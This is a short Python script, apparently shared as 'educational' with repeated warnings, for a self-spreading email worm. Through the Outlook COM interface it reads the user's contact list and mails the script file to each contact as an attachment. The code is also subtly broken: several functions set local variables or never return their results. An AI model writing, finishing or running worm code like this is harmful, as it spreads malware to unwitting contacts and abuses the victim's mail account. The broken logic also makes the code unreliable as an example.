'''
WARNING:

This script is only here for educational purposes only. Please do NOT
attempt to run this on your own device, compute it on someone else's
machine or send this file to anyone for malicious intentions, doing so
will get you a bad time in JAIL! I will NOT be responsible for any
damage this can cause to you and the others.
'''


'''
If you are not sure what's happening and are just wandering around,
please do NOT execute/use it, just EXIT and DELETE the file as soon as
possible! This script can attach itself and send itself to any persons
on your contact list, causing a HUGE damage.
'''



'''
THIS IS THE LAST WARNING!

Again, please do NOT attempt to share/compute it anywhere if you are not
testing it on a safe environment. Any damage that can be caused due to
your carelessness or your intentions despite the warnings will NEVER be
my fault...
'''

import os, time, win32com.client

Outlook = None
namespace = None
mail_item = None

def init(Outlook, namespace):
    Outlook = win32com.client.Dispatch('Outlook.Application')
    namespace = Outlook.GetNamespace('MAPI')

def get_contact(namespace):
    contacts_folder = namespace.GetDefaultFolder(10)
    items = contacts_folder.Items
    emails = []
    for i in range(1, items.Count + 1):
        contact = items.Item(i)
        if hasattr(contact, 'Email1Address'):
            email = contact.Email1Address
            if email:
                emails.append(email)
    
def create_mail(mail_item):
    mail_item = Outlook.CreateItem(0)

def structure(mail_item, subject, body, recipients, file=__file__):
    mail_item.Subject = subject
    mail_item.Body = body
    mail_item.recipients.Add(recipients)
    attachment = mail_item.Attachments.Add(file)

def send(mail_item):
    mail_item.Send()

def setoff(mail_item, emails, subject, body):
    for email in emails:
        structure(mail_item, subject, body, email)
        send(mail_item)
    return
